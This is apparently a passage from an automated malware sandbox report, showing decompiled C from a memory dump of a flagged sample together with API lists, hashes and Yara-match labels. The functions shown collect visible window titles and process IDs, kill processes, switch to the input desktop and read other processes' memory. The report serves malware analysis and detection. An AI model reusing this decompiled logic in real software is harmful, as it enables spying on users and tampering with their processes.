									 *((intOrPtr*)(_t71 + 0x14)) = _t43;
									 *((intOrPtr*)(_t71 + 0x18)) = 1;
									_t44 = E04ECC570(_t36, _t63);
									if(_t44 == 0) {
										HeapFree( *( *_t63), _t44, _t63);
									}
									return 0;
								} else {
									_t25 = _t71 + 0x14c; // 0x14d
									_t78 = _t25;
									EnterCriticalSection(_t78);
									_t50 =  *(_t71 + 0x168);
									if(_t50 == 0) {
										 *(_t63 + 8) = 0;
										 *(_t63 + 4) = 0;
										 *(_t71 + 0x16c) = _t63;
									} else {
										 *(_t50 + 8) = _t63;
										 *(_t63 + 4) =  *(_t71 + 0x168);
									}
									 *((intOrPtr*)(_t71 + 0x164)) =  *((intOrPtr*)(_t71 + 0x164)) + 1;
									 *(_t71 + 0x168) = _t63;
									LeaveCriticalSection(_t78);
									break;
								}
							} else {
								goto L12;
							}
						} else {
							EnterCriticalSection(_t76);
							 *((intOrPtr*)(_t71 + 0x180)) =  *((intOrPtr*)(_t71 + 0x180)) - _v28;
							LeaveCriticalSection(_t76);
							SetLastError(0);
							 *((intOrPtr*)( *_t71 + 0x84))( *((intOrPtr*)(_t63 + 0x14)), _v28);
							L12:
							_t24 = _t71 + 0x84; // 0x85
							_t52 = E04ECC570(_t24, _t63);
							if(_t52 == 0) {
								HeapFree( *( *_t63), _t52, _t63);
							}
							continue;
						}
					}
					L23:
				}
				return 1;
				goto L23;
			}















                                                                                    0x04ece186
                                                                                    0x04ece18a
                                                                                    0x04ece190
                                                                                    0x04ece19d
                                                                                    0x04ece19d
                                                                                    0x04ece1a4
                                                                                    0x04ece1aa
                                                                                    0x04ece1b6
                                                                                    0x04ece1cc
                                                                                    0x04ece1ce
                                                                                    0x04ece1d8
                                                                                    0x00000000
                                                                                    0x04ece1d8
                                                                                    0x04ece1b8
                                                                                    0x04ece1b8
                                                                                    0x04ece1bb
                                                                                    0x04ece1c1
                                                                                    0x04ece1e2
                                                                                    0x04ece1e4
                                                                                    0x04ece1e6
                                                                                    0x04ece1ed
                                                                                    0x04ece1f4
                                                                                    0x04ece1f4
                                                                                    0x04ece1e4
                                                                                    0x04ece1fb
                                                                                    0x04ece203
                                                                                    0x00000000
                                                                                    0x04ece209
                                                                                    0x04ece209
                                                                                    0x04ece211
                                                                                    0x04ece218
                                                                                    0x04ece21e
                                                                                    0x04ece224
                                                                                    0x04ece25d
                                                                                    0x04ece284
                                                                                    0x04ece28f
                                                                                    0x04ece2eb
                                                                                    0x04ece2f1
                                                                                    0x04ece2f8
                                                                                    0x04ece2ff
                                                                                    0x04ece302
                                                                                    0x04ece309
                                                                                    0x04ece310
                                                                                    0x04ece318
                                                                                    0x04ece318
                                                                                    0x04ece326
                                                                                    0x04ece291
                                                                                    0x04ece296
                                                                                    0x04ece296
                                                                                    0x04ece29d
                                                                                    0x04ece29f
                                                                                    0x04ece2a7
                                                                                    0x04ece2b7
                                                                                    0x04ece2be
                                                                                    0x04ece2c5
                                                                                    0x04ece2a9
                                                                                    0x04ece2a9
                                                                                    0x04ece2b2
                                                                                    0x04ece2b2
                                                                                    0x04ece2cb
                                                                                    0x04ece2d2
                                                                                    0x04ece2d8
                                                                                    0x00000000
                                                                                    0x04ece2d8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ece226
                                                                                    0x04ece22c
                                                                                    0x04ece232
                                                                                    0x04ece239
                                                                                    0x04ece241
                                                                                    0x04ece252
                                                                                    0x04ece25f
                                                                                    0x04ece260
                                                                                    0x04ece266
                                                                                    0x04ece26d
                                                                                    0x04ece279
                                                                                    0x04ece279
                                                                                    0x00000000
                                                                                    0x04ece26d
                                                                                    0x04ece224
                                                                                    0x00000000
                                                                                    0x04ece203
                                                                                    0x04ece2e9
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(0000014D), ref: 04ECE1A4
                                                                                    • LeaveCriticalSection.KERNEL32(0000014D), ref: 04ECE1FB
                                                                                    • send.WS2_32(?,00000000,00000001,00000000), ref: 04ECE218
                                                                                    • LeaveCriticalSection.KERNEL32(0000014D), ref: 04ECE239
                                                                                    • SetLastError.KERNEL32(00000000), ref: 04ECE241
                                                                                    • HeapFree.KERNEL32(00000000,00000000,?,?), ref: 04ECE279
                                                                                    • WSAGetLastError.WS2_32 ref: 04ECE284
                                                                                    • LeaveCriticalSection.KERNEL32(0000014D), ref: 04ECE2D8
                                                                                    • HeapFree.KERNEL32(00000000,00000000,?,?), ref: 04ECE318
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$Leave$ErrorFreeHeapLast$Entersend
                                                                                    • String ID:
                                                                                    • API String ID: 1657114447-0
                                                                                    • Opcode ID: 001a89e81521b7216f7a458a12692be26673b4c1254fe04182b9f7a8d83f83ca
                                                                                    • Instruction ID: 3f37a955252aded95bb59f3ff9d790f4c2c455ae2b08ca4e7637ba408bfc6702
                                                                                    • Opcode Fuzzy Hash: 001a89e81521b7216f7a458a12692be26673b4c1254fe04182b9f7a8d83f83ca
                                                                                    • Instruction Fuzzy Hash: E6415E71200601EFD708CF69D988BA6BBE8FF45315F008259E929CB244DB75F966CBD1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC5080, Relevance: 13.6, APIs: 9, Instructions: 79stringmemorywindowCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 89%
                                                                                    			E04EC5080(void* __ebx, void* __edi, void* __esi, struct HWND__* _a4, void** _a8) {
				signed int _v8;
				short _v2056;
				void** _v2060;
				signed int _t18;
				void** _t20;
				signed int _t36;
				struct HWND__* _t44;
				void* _t50;
				void* _t51;
				void* _t52;
				int _t53;
				DWORD* _t54;
				signed int _t56;

				_t52 = __esi;
				_t18 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t18 ^ _t56;
				_t20 = _a8;
				_t44 = _a4;
				_t50 =  *_t20;
				_v2060 = _t20;
				E04EDDAD0(_t50,  &_v2056, 0, 0x400);
				GetWindowTextW(_t44,  &_v2056, 0x3ff);
				if(IsWindowVisible(_t44) != 0 && lstrlenW( &_v2056) != 0) {
					if(_t50 == 0) {
						_t50 = LocalAlloc(0x40, 1);
					}
					_push(_t52);
					_t53 = LocalSize(_t50);
					_t51 = LocalReAlloc(_t50, 6 + lstrlenW( &_v2056) * 2 + _t53, 0x42);
					_t54 = _t53 + _t51;
					GetWindowThreadProcessId(_t44, _t54);
					_t36 = lstrlenW( &_v2056);
					_t15 =  &(_t54[1]); // 0x4
					E04EDDC90(_t15,  &_v2056, 2 + _t36 * 2);
					 *_v2060 = _t51;
				}
				return E04ED572E(_v8 ^ _t56);
			}
















                                                                                    0x04ec5080
                                                                                    0x04ec5089
                                                                                    0x04ec5090
                                                                                    0x04ec5093
                                                                                    0x04ec5097
                                                                                    0x04ec509b
                                                                                    0x04ec50a2
                                                                                    0x04ec50b1
                                                                                    0x04ec50c6
                                                                                    0x04ec50d5
                                                                                    0x04ec50ee
                                                                                    0x04ec50fa
                                                                                    0x04ec50fa
                                                                                    0x04ec50fc
                                                                                    0x04ec5104
                                                                                    0x04ec5126
                                                                                    0x04ec5128
                                                                                    0x04ec512c
                                                                                    0x04ec5139
                                                                                    0x04ec514e
                                                                                    0x04ec5152
                                                                                    0x04ec5160
                                                                                    0x04ec5162
                                                                                    0x04ec5174

                                                                                    APIs
                                                                                    • GetWindowTextW.USER32 ref: 04EC50C6
                                                                                    • IsWindowVisible.USER32 ref: 04EC50CD
                                                                                    • lstrlenW.KERNEL32(?), ref: 04EC50E2
                                                                                    • LocalAlloc.KERNEL32(00000040,00000001), ref: 04EC50F4
                                                                                    • LocalSize.KERNEL32 ref: 04EC50FE
                                                                                    • lstrlenW.KERNEL32(?), ref: 04EC510D
                                                                                    • LocalReAlloc.KERNEL32(?,?,00000042), ref: 04EC5120
                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 04EC512C
                                                                                    • lstrlenW.KERNEL32(?,?,?,00000042), ref: 04EC5139
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LocalWindowlstrlen$Alloc$ProcessSizeTextThreadVisible
                                                                                    • String ID:
                                                                                    • API String ID: 925664022-0
                                                                                    • Opcode ID: 7f833d6ac3fca85a9c7a026cf338037184efec5223c0e8701f9374eaf67f20f9
                                                                                    • Instruction ID: 9427b31d98d8bbd2cb5873a81a4b47779b917445980cd96e277e8147b6329119
                                                                                    • Opcode Fuzzy Hash: 7f833d6ac3fca85a9c7a026cf338037184efec5223c0e8701f9374eaf67f20f9
                                                                                    • Instruction Fuzzy Hash: C52183B5640118ABD710DF61DD89FABB7FCFB84711F045065FA49D7140DE38AA49CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC5530, Relevance: 13.6, APIs: 9, Instructions: 74threadstringCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 95%
                                                                                    			E04EC5530(void* __ebx, void* __edi, void* __esi) {
				signed int _v8;
				char _v264;
				char _v520;
				long _v524;
				struct HDESK__* _v528;
				signed int _t13;
				struct HDESK__* _t41;
				void* _t43;
				signed int _t46;

				_t13 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t13 ^ _t46;
				_t43 = GetThreadDesktop(GetCurrentThreadId());
				_v528 = _t43;
				E04EDDAD0(__edi,  &_v264, 0, 0x100);
				GetUserObjectInformationA(_t43, 2,  &_v264, 0x100,  &_v524);
				_t41 = OpenInputDesktop(0, 0, 0x2000000);
				E04EDDAD0(_t41,  &_v520, 0, 0x100);
				GetUserObjectInformationA(_t41, 2,  &_v520, 0x100,  &_v524);
				if(lstrcmpiA( &_v520,  &_v264) != 0) {
					SetThreadDesktop(_t41);
				}
				CloseDesktop(_v528);
				CloseDesktop(_t41);
				return E04ED572E(_v8 ^ _t46);
			}












                                                                                    0x04ec5539
                                                                                    0x04ec5540
                                                                                    0x04ec5555
                                                                                    0x04ec5565
                                                                                    0x04ec556b
                                                                                    0x04ec558f
                                                                                    0x04ec55a5
                                                                                    0x04ec55b0
                                                                                    0x04ec55ce
                                                                                    0x04ec55e6
                                                                                    0x04ec55e9
                                                                                    0x04ec55ef
                                                                                    0x04ec55fd
                                                                                    0x04ec5600
                                                                                    0x04ec5614

                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 04EC5548
                                                                                    • GetThreadDesktop.USER32(00000000), ref: 04EC554F
                                                                                    • GetUserObjectInformationA.USER32 ref: 04EC558F
                                                                                    • OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 04EC559A
                                                                                    • GetUserObjectInformationA.USER32 ref: 04EC55CE
                                                                                    • lstrcmpiA.KERNEL32(?,?), ref: 04EC55DE
                                                                                    • SetThreadDesktop.USER32(00000000), ref: 04EC55E9
                                                                                    • CloseDesktop.USER32(?), ref: 04EC55FD
                                                                                    • CloseDesktop.USER32(00000000), ref: 04EC5600
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Desktop$Thread$CloseInformationObjectUser$CurrentInputOpenlstrcmpi
                                                                                    • String ID:
                                                                                    • API String ID: 3718465862-0
                                                                                    • Opcode ID: 71951129221e747d7bb8928ecdffac2d1e7c50bdecf985ad87686a26a7e676db
                                                                                    • Instruction ID: 6fc49cc79fa7ef0321549e8a71e54a185c56aab568cd86c1b69eeb9b9aaa63df
                                                                                    • Opcode Fuzzy Hash: 71951129221e747d7bb8928ecdffac2d1e7c50bdecf985ad87686a26a7e676db
                                                                                    • Instruction Fuzzy Hash: 9821A8B594022C7BEB11DB61DC49FEA777CEB44711F100196FE45E7181DAB46E848FA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC4320, Relevance: 13.6, APIs: 9, Instructions: 73sleepCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 33%
                                                                                    			E04EC4320(intOrPtr __ecx, intOrPtr _a4, void* _a8) {
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				int _t17;
				int _t20;
				void* _t28;
				intOrPtr _t31;
				void* _t34;
				void* _t36;
				void* _t39;
				void* _t40;
				void* _t42;

				_t31 = __ecx;
				_push(__ecx);
				_t28 = _a8;
				_push(_t39);
				_t36 = 0;
				_v8 = __ecx;
				if(_t28 == 0) {
					L2:
					Sleep(0x64);
					_t40 = E04EC4BC0(_t28, _t34, _t36, _t39);
					if(_t40 != 0) {
						_t20 = LocalSize(_t40);
						_push(_t31);
						_push(0x3f);
						_push(_t20);
						_push(_t40);
						_t31 =  *((intOrPtr*)(_v8 + 4));
						E04EB1C60(_t31);
						LocalFree(_t40);
					}
					_a8 = 0;
					EnumWindows(E04EC5080,  &_a8);
					_t16 = _a8;
					if(_t16 != 0) {
						 *_t16 = 0x82;
						_t42 = _a8;
						if(_t42 != 0) {
							_t17 = LocalSize(_t42);
							_push(_t31);
							_push(0x3f);
							_push(_t17);
							_push(_t42);
							E04EB1C60( *((intOrPtr*)(_v8 + 4)));
							_t16 = LocalFree(_t42);
						}
					}
					return _t16;
				} else {
					goto L1;
				}
				do {
					L1:
					_t39 = OpenProcess(0x1fffff, 0,  *(_t36 + _a4));
					TerminateProcess(_t39, 0);
					CloseHandle(_t39);
					_t36 = _t36 + 4;
				} while (_t36 < _t28);
				goto L2;
			}

















                                                                                    0x04ec4320
                                                                                    0x04ec4323
                                                                                    0x04ec4325
                                                                                    0x04ec4328
                                                                                    0x04ec432a
                                                                                    0x04ec432c
                                                                                    0x04ec4331
                                                                                    0x04ec435f
                                                                                    0x04ec4361
                                                                                    0x04ec4372
                                                                                    0x04ec437c
                                                                                    0x04ec437f
                                                                                    0x04ec4381
                                                                                    0x04ec4385
                                                                                    0x04ec4387
                                                                                    0x04ec4388
                                                                                    0x04ec4389
                                                                                    0x04ec438c
                                                                                    0x04ec4392
                                                                                    0x04ec4392
                                                                                    0x04ec4397
                                                                                    0x04ec43a4
                                                                                    0x04ec43aa
                                                                                    0x04ec43af
                                                                                    0x04ec43b1
                                                                                    0x04ec43b4
                                                                                    0x04ec43b9
                                                                                    0x04ec43bc
                                                                                    0x04ec43be
                                                                                    0x04ec43bf
                                                                                    0x04ec43c1
                                                                                    0x04ec43c5
                                                                                    0x04ec43c9
                                                                                    0x04ec43cf
                                                                                    0x04ec43cf
                                                                                    0x04ec43b9
                                                                                    0x04ec43d7
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec4333
                                                                                    0x04ec4333
                                                                                    0x04ec4346
                                                                                    0x04ec434b
                                                                                    0x04ec4352
                                                                                    0x04ec4358
                                                                                    0x04ec435b
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,?,?,?,?,?,04EC4274,?,?), ref: 04EC4340
                                                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,?,?,04EC4274,?,?), ref: 04EC434B
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,04EC4274,?,?), ref: 04EC4352
                                                                                    • Sleep.KERNEL32(00000064,?,?,?,?,?,04EC4274,?,?), ref: 04EC4361
                                                                                    • LocalSize.KERNEL32 ref: 04EC437F
                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,0000003F,?,?,?,?,?,?,04EC4274,?,?), ref: 04EC4392
                                                                                    • EnumWindows.USER32(04EC5080,?), ref: 04EC43A4
                                                                                    • LocalSize.KERNEL32 ref: 04EC43BC
                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,0000003F,?,?,?,?,?,?,04EC4274,?,?), ref: 04EC43CF
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Local$FreeProcessSize$CloseEnumHandleOpenSleepTerminateWindows
                                                                                    • String ID:
                                                                                    • API String ID: 1695776769-0
                                                                                    • Opcode ID: f4fd36489e36ec98e4e04a8b3131e7f3bdeca066ca92d60b658720ce4b6a4baa
                                                                                    • Instruction ID: 48ff2dc44c62663eec4227098a5fecfbedacf1817d15dbd4fdb9857d92fdce8e
                                                                                    • Opcode Fuzzy Hash: f4fd36489e36ec98e4e04a8b3131e7f3bdeca066ca92d60b658720ce4b6a4baa
                                                                                    • Instruction Fuzzy Hash: 3111D531601214BBD711AF9ADD45FAE776CEF85750F014119FD1497280CB74BE018BE4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC2680, Relevance: 13.6, APIs: 9, Instructions: 51COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E04EC2680(intOrPtr* __ecx) {
				int _t29;
				intOrPtr* _t33;
				void* _t34;
				struct HICON__** _t37;
				void* _t38;

				_t33 = __ecx;
				 *__ecx = 0x4efdcb4;
				ReleaseDC( *(__ecx + 0x104),  *(__ecx + 0x3c));
				DeleteDC( *(_t33 + 0x40));
				DeleteDC( *(_t33 + 0x44));
				DeleteDC( *(_t33 + 0x48));
				DeleteDC( *(_t33 + 0x78));
				DeleteObject( *(_t33 + 0x4c));
				DeleteObject( *(_t33 + 0x50));
				DeleteObject( *(_t33 + 0x7c));
				_t25 =  *((intOrPtr*)(_t33 + 0x14));
				if( *((intOrPtr*)(_t33 + 0x14)) != 0) {
					E04ED573F(_t25);
					_t38 = _t38 + 4;
				}
				E04ED573F( *((intOrPtr*)(_t33 + 0x60)));
				E04ED573F( *((intOrPtr*)(_t33 + 0x5c)));
				E04ED573F( *((intOrPtr*)(_t33 + 0x64)));
				_t37 = _t33 + 0xc4;
				 *((intOrPtr*)(_t33 + 0x80)) = 0x4efdc9c;
				_t34 = 0x10;
				do {
					_t29 = DestroyCursor( *_t37);
					_t37 =  &(_t37[1]);
					_t34 = _t34 - 1;
				} while (_t34 != 0);
				return _t29;
			}








                                                                                    0x04ec2683
                                                                                    0x04ec2688
                                                                                    0x04ec2694
                                                                                    0x04ec26a3
                                                                                    0x04ec26a8
                                                                                    0x04ec26ad
                                                                                    0x04ec26b2
                                                                                    0x04ec26bd
                                                                                    0x04ec26c2
                                                                                    0x04ec26c7
                                                                                    0x04ec26c9
                                                                                    0x04ec26ce
                                                                                    0x04ec26d1
                                                                                    0x04ec26d6
                                                                                    0x04ec26d6
                                                                                    0x04ec26dc
                                                                                    0x04ec26e4
                                                                                    0x04ec26ec
                                                                                    0x04ec26f7
                                                                                    0x04ec26fd
                                                                                    0x04ec270a
                                                                                    0x04ec2710
                                                                                    0x04ec2712
                                                                                    0x04ec2714
                                                                                    0x04ec2717
                                                                                    0x04ec2717
                                                                                    0x04ec271f

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Delete$Object$CursorDestroyRelease
                                                                                    • String ID:
                                                                                    • API String ID: 1665608007-0
                                                                                    • Opcode ID: be77ade47f0160ddfd38729ea740ccbd1a96462737f2c526dbed2d1103537053
                                                                                    • Instruction ID: 4ee8632f17418b36ef5ff2e3e13a00c3464bb7b6c75c961c67391e8afac3da61
                                                                                    • Opcode Fuzzy Hash: be77ade47f0160ddfd38729ea740ccbd1a96462737f2c526dbed2d1103537053
                                                                                    • Instruction Fuzzy Hash: 8C110971A0052ABBEB126F22DD44989BF66FF402A4B101026EA1953520DB36BC35EFD4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB5D7C, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 186libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 25%
                                                                                    			E04EB5D7C(void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a12) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v32;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v84;
				intOrPtr _v976;
				intOrPtr _v980;
				signed int _v988;
				char _v1100;
				intOrPtr _v1968;
				intOrPtr _v1972;
				char _v2004;
				intOrPtr _v2008;
				char _v2012;
				intOrPtr _v2016;
				signed int _t61;
				struct HINSTANCE__* _t63;
				struct HINSTANCE__* _t65;
				signed int _t86;
				intOrPtr* _t110;
				intOrPtr* _t114;
				intOrPtr _t133;
				intOrPtr* _t135;
				intOrPtr* _t140;
				intOrPtr _t143;
				void* _t144;
				signed int _t147;
				void* _t151;
				signed int _t152;
				intOrPtr _t175;

				_t114 = __ecx;
				L04ED57B1(_a12);
				_t152 = _t151 + 4;
				E04EDDA58(0, 0);
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_t147 = _t152;
				_t61 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t61 ^ _t147;
				_push(__esi);
				_v2016 = __edx;
				_t135 = _t114;
				_t63 = GetModuleHandleA("ntdll.dll");
				if(_t63 != 0) {
					L4:
					_t140 = GetProcAddress(_t63, "NtWow64QueryInformationProcess64");
				} else {
					_t63 = LoadLibraryA("ntdll.dll");
					if(_t63 != 0) {
						goto L4;
					} else {
						_t140 = 0;
					}
				}
				_t65 = GetModuleHandleA("ntdll.dll");
				if(_t65 != 0) {
					L8:
					_t110 = GetProcAddress(_t65, "NtWow64ReadVirtualMemory64");
				} else {
					_t65 = LoadLibraryA("ntdll.dll");
					if(_t65 != 0) {
						goto L8;
					} else {
						_t110 = 0;
					}
				}
				if(_t140 == 0 || _t110 == 0) {
					 *((intOrPtr*)(_t135 + 0x14)) = 7;
					 *((intOrPtr*)(_t135 + 0x10)) = 0;
					 *_t135 = 0;
					E04EB32A0(_t135, 0x4efb5d0);
					__eflags = _v8 ^ _t147;
					return E04ED572E(_v8 ^ _t147, 0);
				} else {
					E04EDDAD0(_t135,  &_v84, 0, 0x30);
					asm("xorps xmm0, xmm0");
					asm("movlpd [ebp-0x7d8], xmm0");
					_push( &_v2012);
					_push(0x30);
					_push( &_v84);
					_push(0);
					_push(_v2016);
					if( *_t140() < 0 || _v2012 != 0x30 || _v2008 != 0) {
						L25:
						E04EB31B0(_t135, _t135, 0x4efb5d0);
						__eflags = _v8 ^ _t147;
						return E04ED572E(_v8 ^ _t147);
					} else {
						_t143 = _v2016;
						_push( &_v2012);
						_push(0);
						_push(0x388);
						_push( &_v2004);
						_push(_v72);
						_push(_v76);
						_push(_t143);
						if( *_t110() < 0 || _v2012 != 0x388 || _v2008 != 0) {
							goto L25;
						} else {
							_push( &_v2012);
							_push(0);
							_push(0x3f8);
							_push( &_v1100);
							_push(_v1968);
							_push(_v1972);
							_push(_t143);
							if( *_t110() < 0 || _v2012 != 0x3f8) {
								goto L25;
							} else {
								_t175 = _v2008;
								if(_t175 != 0) {
									goto L25;
								} else {
									_t86 = (_v988 & 0x0000ffff) + 1;
									_t144 = E04ED5785( ~(_t175 > 0) | _t86 * 0x00000002, _t143, _t175);
									E04EDDAD0(_t135, _t144, 0, 2 + (_v988 & 0x0000ffff) * 2);
									asm("cdq");
									 *_t110(_v2016, _v980, _v976, _t144, _v988 & 0x0000ffff, _t86 * 2 >> 0x20,  &_v2012,  ~(_t175 > 0) | _t86 * 0x00000002);
									E04EB31B0( &_v32, _t135, _t144);
									E04ED573F(_t144);
									 *((intOrPtr*)(_t135 + 0x14)) = 7;
									 *((intOrPtr*)(_t135 + 0x10)) = 0;
									 *_t135 = 0;
									_t133 = _v12;
									if(_t133 >= 8) {
										 *_t135 = _v32;
										_v32 = 0;
									} else {
										_t104 = _v16 + 1;
										if(_v16 + 1 != 0) {
											E04EDCC90(_t135,  &_v32, _t104 + _t104);
											_t133 = _v12;
										}
									}
									 *((intOrPtr*)(_t135 + 0x10)) = _v16;
									 *((intOrPtr*)(_t135 + 0x14)) = _t133;
									_v12 = 7;
									_v16 = 0;
									_v32 = 0;
									E04EB3170( &_v32);
									return E04ED572E(_v8 ^ _t147);
								}
							}
						}
					}
				}
			}



































                                                                                    0x04eb5d7c
                                                                                    0x04eb5d7f
                                                                                    0x04eb5d84
                                                                                    0x04eb5d8b
                                                                                    0x04eb5d90
                                                                                    0x04eb5d91
                                                                                    0x04eb5d92
                                                                                    0x04eb5d93
                                                                                    0x04eb5d94
                                                                                    0x04eb5d95
                                                                                    0x04eb5d96
                                                                                    0x04eb5d97
                                                                                    0x04eb5d98
                                                                                    0x04eb5d99
                                                                                    0x04eb5d9a
                                                                                    0x04eb5d9b
                                                                                    0x04eb5d9c
                                                                                    0x04eb5d9d
                                                                                    0x04eb5d9e
                                                                                    0x04eb5d9f
                                                                                    0x04eb5da1
                                                                                    0x04eb5da9
                                                                                    0x04eb5db0
                                                                                    0x04eb5db4
                                                                                    0x04eb5dbb
                                                                                    0x04eb5dc1
                                                                                    0x04eb5dc3
                                                                                    0x04eb5dd1
                                                                                    0x04eb5de2
                                                                                    0x04eb5dee
                                                                                    0x04eb5dd3
                                                                                    0x04eb5dd8
                                                                                    0x04eb5ddc
                                                                                    0x00000000
                                                                                    0x04eb5dde
                                                                                    0x04eb5dde
                                                                                    0x04eb5dde
                                                                                    0x04eb5ddc
                                                                                    0x04eb5df5
                                                                                    0x04eb5dfd
                                                                                    0x04eb5e0e
                                                                                    0x04eb5e1a
                                                                                    0x04eb5dff
                                                                                    0x04eb5e04
                                                                                    0x04eb5e08
                                                                                    0x00000000
                                                                                    0x04eb5e0a
                                                                                    0x04eb5e0a
                                                                                    0x04eb5e0a
                                                                                    0x04eb5e08
                                                                                    0x04eb5e1e
                                                                                    0x04eb6021
                                                                                    0x04eb6029
                                                                                    0x04eb6037
                                                                                    0x04eb603a
                                                                                    0x04eb6046
                                                                                    0x04eb6051
                                                                                    0x04eb5e2c
                                                                                    0x04eb5e34
                                                                                    0x04eb5e42
                                                                                    0x04eb5e45
                                                                                    0x04eb5e4d
                                                                                    0x04eb5e4e
                                                                                    0x04eb5e53
                                                                                    0x04eb5e54
                                                                                    0x04eb5e56
                                                                                    0x04eb5e60
                                                                                    0x04eb6000
                                                                                    0x04eb6007
                                                                                    0x04eb6014
                                                                                    0x04eb601e
                                                                                    0x04eb5e80
                                                                                    0x04eb5e80
                                                                                    0x04eb5e8c
                                                                                    0x04eb5e8d
                                                                                    0x04eb5e8f
                                                                                    0x04eb5e9a
                                                                                    0x04eb5e9b
                                                                                    0x04eb5e9e
                                                                                    0x04eb5ea1
                                                                                    0x04eb5ea6
                                                                                    0x00000000
                                                                                    0x04eb5ec9
                                                                                    0x04eb5ecf
                                                                                    0x04eb5ed0
                                                                                    0x04eb5ed2
                                                                                    0x04eb5edd
                                                                                    0x04eb5ede
                                                                                    0x04eb5ee4
                                                                                    0x04eb5eea
                                                                                    0x04eb5eef
                                                                                    0x00000000
                                                                                    0x04eb5f05
                                                                                    0x04eb5f05
                                                                                    0x04eb5f0c
                                                                                    0x00000000
                                                                                    0x04eb5f12
                                                                                    0x04eb5f1b
                                                                                    0x04eb5f30
                                                                                    0x04eb5f44
                                                                                    0x04eb5f5a
                                                                                    0x04eb5f70
                                                                                    0x04eb5f76
                                                                                    0x04eb5f7c
                                                                                    0x04eb5f83
                                                                                    0x04eb5f8a
                                                                                    0x04eb5f94
                                                                                    0x04eb5f97
                                                                                    0x04eb5f9d
                                                                                    0x04eb5fbf
                                                                                    0x04eb5fc1
                                                                                    0x04eb5f9f
                                                                                    0x04eb5fa2
                                                                                    0x04eb5fa5
                                                                                    0x04eb5faf
                                                                                    0x04eb5fb4
                                                                                    0x04eb5fb7
                                                                                    0x04eb5fa5
                                                                                    0x04eb5fcd
                                                                                    0x04eb5fd3
                                                                                    0x04eb5fd6
                                                                                    0x04eb5fdd
                                                                                    0x04eb5fe4
                                                                                    0x04eb5fe8
                                                                                    0x04eb5fff
                                                                                    0x04eb5fff
                                                                                    0x04eb5f0c
                                                                                    0x04eb5eef
                                                                                    0x04eb5ea6
                                                                                    0x04eb5e60

                                                                                    APIs
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 04EB5D8B
                                                                                      • Part of subcall function 04EDDA58: RaiseException.KERNEL32(?,?,?,04ED60CF,76734560,00000000,?,?,?,?,?,?,04ED60CF,04ED5768,04F0056C,04ED5768), ref: 04EDDAB7
                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 04EB5DC3
                                                                                    • LoadLibraryA.KERNEL32(ntdll.dll), ref: 04EB5DD8
                                                                                    • GetProcAddress.KERNEL32(00000000,NtWow64QueryInformationProcess64), ref: 04EB5DE8
                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 04EB5DF5
                                                                                    • LoadLibraryA.KERNEL32(ntdll.dll), ref: 04EB5E04
                                                                                    • GetProcAddress.KERNEL32(00000000,NtWow64ReadVirtualMemory64), ref: 04EB5E14
                                                                                    Strings
                                                                                    Memory Dump Source
